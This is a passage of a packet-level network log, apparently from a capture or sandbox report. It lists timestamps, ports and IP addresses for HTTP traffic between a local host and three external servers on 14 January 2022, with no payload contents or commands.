Jan 14, 2022 00:16:14.631128073 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631167889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631167889 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631206989 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631242037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631246090 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631280899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631319046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631326914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631357908 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631397963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631398916 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631433964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631472111 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631478071 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631513119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631563902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631565094 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631604910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631640911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631665945 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631679058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631716967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631725073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631758928 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631797075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631799936 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631834984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631874084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631897926 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631913900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631951094 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.631962061 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.631989002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632026911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632040024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632066965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632116079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632117987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632154942 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632194042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632201910 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632234097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632270098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632280111 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632301092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632345915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632359982 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632369995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632411003 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632440090 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.632448912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.632517099 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.638539076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.638679028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.639045954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.639398098 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.639647007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.639765024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.639997959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640089989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640177011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640263081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640350103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640436888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640518904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640604019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640690088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640814066 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640908003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.640993118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.641078949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.678564072 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.693818092 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.700639009 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:14.707128048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707137108 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707156897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707179070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707200050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707221031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707247019 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707253933 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707285881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707309961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707324028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707334042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707376003 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707396030 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707695007 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707721949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707746983 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707768917 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707789898 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707792044 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707820892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707839966 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707845926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707870960 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707892895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707894087 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707916021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707931995 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707938910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707962990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.707968950 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.707984924 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708007097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708028078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708039045 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708050013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708074093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708082914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708097935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708120108 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708122015 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708143950 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708162069 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708167076 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708189964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708200932 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708214045 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708236933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708257914 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708266973 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708282948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708306074 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708306074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708328962 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708350897 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708350897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708375931 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708398104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708415985 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708420992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708446026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708450079 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708470106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708484888 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708493948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708517075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708538055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708539009 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708556890 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:14.708584070 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708626032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:14.708811998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709067106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709173918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709311008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709439039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709578991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709599018 CET	49919	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709728956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709824085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.709943056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710150957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710283995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710408926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710586071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710730076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.710935116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711082935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711249113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711332083 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711455107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711569071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711675882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711796999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.711904049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712007999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712105036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712203026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712301016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712400913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712498903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712610006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712714911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712825060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.712923050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713027000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713126898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713227034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713330030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713443041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713552952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713660002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713783979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.713892937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714000940 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714107037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714215994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714327097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714432001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714540958 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.714884043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715063095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715181112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715284109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715389013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715496063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715605021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715735912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715840101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.715944052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716046095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716228008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716331005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716433048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716531038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716633081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716763973 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716871023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.716974020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717082024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717190981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717294931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717401028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717509031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717617989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717736959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717843056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.717959881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718056917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718178034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718264103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718363047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718466043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718580961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718684912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.718810081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719014883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719146967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719249010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719352961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719460011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719564915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.719674110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723301888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723479033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723633051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723757029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723865032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.723983049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724092960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724206924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724314928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724421978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724534035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724706888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724849939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.724958897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725061893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725198030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725311041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725425959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725548983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725655079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725821018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.725936890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726052046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726152897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726250887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726352930 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726454020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726639986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726655006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726768970 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726861000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.726969957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727072001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727173090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727271080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727370024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727469921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727569103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727669954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727771044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727865934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.727969885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728070021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728168011 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728262901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728363037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728463888 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728569984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728672981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728773117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728869915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.728971004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729068995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729173899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729195118 CET	80	49922	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:14.729289055 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.729289055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729382038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729429007 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.729470968 CET	49922	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:14.729577065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729598999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729671955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729775906 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729876041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.729973078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730072975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730174065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730273008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730375051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730478048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730576992 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730668068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730762959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730854034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.730948925 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731041908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731141090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731240988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731322050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731415987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731509924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731622934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731723070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.731904030 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732132912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732240915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732335091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732434988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732538939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.732650995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.733023882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.733170986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.733352900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.733474016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.748871088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.748965979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749126911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749258041 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749361038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749479055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:14.749587059 CET	49902	80	192.168.2.4	185.215.113.35
